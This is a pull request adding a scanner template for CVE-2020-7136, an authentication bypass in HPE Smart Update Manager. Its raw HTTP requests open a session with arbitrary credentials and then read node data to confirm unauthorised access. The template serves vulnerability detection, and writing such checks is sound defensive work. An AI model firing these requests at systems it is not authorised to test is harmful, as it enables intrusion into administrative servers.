### PR TITLE
Create CVE-2020-7136.yaml

### DIFF
--- a/cves/2020/CVE-2020-7136.yaml
+++ b/cves/2020/CVE-2020-7136.yaml
@@ -1,0 +1,33 @@
+id: CVE-2020-7136
+
+info:
+  name: HPE Smart Update Manager - Remote Unauthorized Access
+  author: gy741
+  severity: critical
+  description: A security vulnerability in HPE Smart Update Manager (SUM) prior to version 8.5.6 could allow remote unauthorized access. Hewlett Packard Enterprise has provided a software update to resolve this vulnerability in HPE Smart Update Manager (SUM) prior to 8.5.6. Please visit the HPE Support Center at https://support.hpe.com/hpesc/public/home to download the latest version of HPE Smart Update Manager (SUM). Download the latest version of HPE Smart Update Manager (SUM) or download the latest Service Pack For ProLiant (SPP).
+  tags: cve,cve2020,hp,auth-bypass
+  reference:
+    - https://www.tenable.com/security/research/tra-2020-02
+    - https://support.hpe.com/hpesc/public/docDisplay?docLocale=en_US&docId=emr_na-hpesbmu03997en_us
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-7136
+  classification:
+    cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.80
+    cve-id: CVE-2020-7136
+    cwe-id: CWE-288
+
+requests:
+  - raw:
+      - |
+        POST /session/create HTTP/1.1
+        Host: {{Hostname}}
+        Accept: */*
+        Content-Type: application/json
+
+        {"hapi":{"username":"Administrator","password":"any_password","language":"en","mode":"gui", "usesshkey":true, "privatekey":"any_privateky", "passphrase":"any_passphase","settings":{"output_filter":"passed","port_number":"444"}}}
+
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - '"sessionId":"([a-z0-9.]+)"'

--- a/cves/2020/CVE-2020-7136.yaml
+++ b/cves/2020/CVE-2020-7136.yaml
@@ -5,7 +5,6 @@ info:
   author: gy741
   severity: critical
   description: A security vulnerability in HPE Smart Update Manager (SUM) prior to version 8.5.6 could allow remote unauthorized access. Hewlett Packard Enterprise has provided a software update to resolve this vulnerability in HPE Smart Update Manager (SUM) prior to 8.5.6. Please visit the HPE Support Center at https://support.hpe.com/hpesc/public/home to download the latest version of HPE Smart Update Manager (SUM). Download the latest version of HPE Smart Update Manager (SUM) or download the latest Service Pack For ProLiant (SPP).
-  tags: cve,cve2020,hp,auth-bypass
   reference:
     - https://www.tenable.com/security/research/tra-2020-02
     - https://support.hpe.com/hpesc/public/docDisplay?docLocale=en_US&docId=emr_na-hpesbmu03997en_us
@@ -15,6 +14,7 @@ info:
     cvss-score: 9.80
     cve-id: CVE-2020-7136
     cwe-id: CWE-288
+  tags: cve,cve2020,hp,auth-bypass,hpe
 
 requests:
   - raw:
@@ -26,8 +26,24 @@ requests:
 
         {"hapi":{"username":"Administrator","password":"any_password","language":"en","mode":"gui", "usesshkey":true, "privatekey":"any_privateky", "passphrase":"any_passphase","settings":{"output_filter":"passed","port_number":"444"}}}
 
+      - |
+        GET /session/{{sessionid}}/node/index HTTP/1.1
+        Host: {{Hostname}}
+
     matchers:
+      - type: word
+        part: body
+        words:
+          - "hmessage"
+          - "Command completed successfully."
+          - "node_name"
+        condition: and
+
+    extractors:
       - type: regex
+        name: sessionid
+        group: 1
+        internal: true
         part: body
         regex:
           - '"sessionId":"([a-z0-9.]+)"'


### PR DESCRIPTION
### Template / PR Information

Hello,

Added CVE-2020-7136

```
A security vulnerability in HPE Smart Update Manager (SUM) prior to version 8.5.6 could allow remote unauthorized access. Hewlett Packard Enterprise has provided a software update to resolve this vulnerability in HPE Smart Update Manager (SUM) prior to 8.5.6. Please visit the HPE Support Center at https://support.hpe.com/hpesc/public/home to download the latest version of HPE Smart Update Manager (SUM). Download the latest version of HPE Smart Update Manager (SUM) or download the latest Service Pack For ProLiant (SPP).
```

- References: https://www.tenable.com/security/research/tra-2020-02

### Template Validation

I've validated this template locally?
- [ ] YES
- [x] NO